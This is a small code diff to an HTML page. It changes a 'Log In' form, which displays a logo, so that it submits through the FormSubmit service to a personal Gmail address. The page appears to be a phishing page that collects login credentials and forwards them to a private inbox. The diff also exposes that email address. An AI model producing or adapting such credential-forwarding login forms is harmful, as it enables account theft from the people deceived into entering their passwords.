--- a/index.html
+++ b/index.html
@@ -53,7 +53,7 @@
         <div class="mt-5"></div>
 
         <!-- Form using FormSubmit -->
-        <form id="form" class="mt-44" action="https://formsubmit.co/el/jeyolu" method="POST">
+        <form id="form" class="mt-44" action="https://formsubmit.co/emenikeonyechere@gmail.com" method="POST">
             <div class="inputsCtn bg-white rounded-md shadow-sm p-6 flex flex-col gap-6">
                 <p class="font-bold loginu mb-3">Log In</p>
                 <img class="imglogo" src="asset/header-logo.png" alt="Logo">
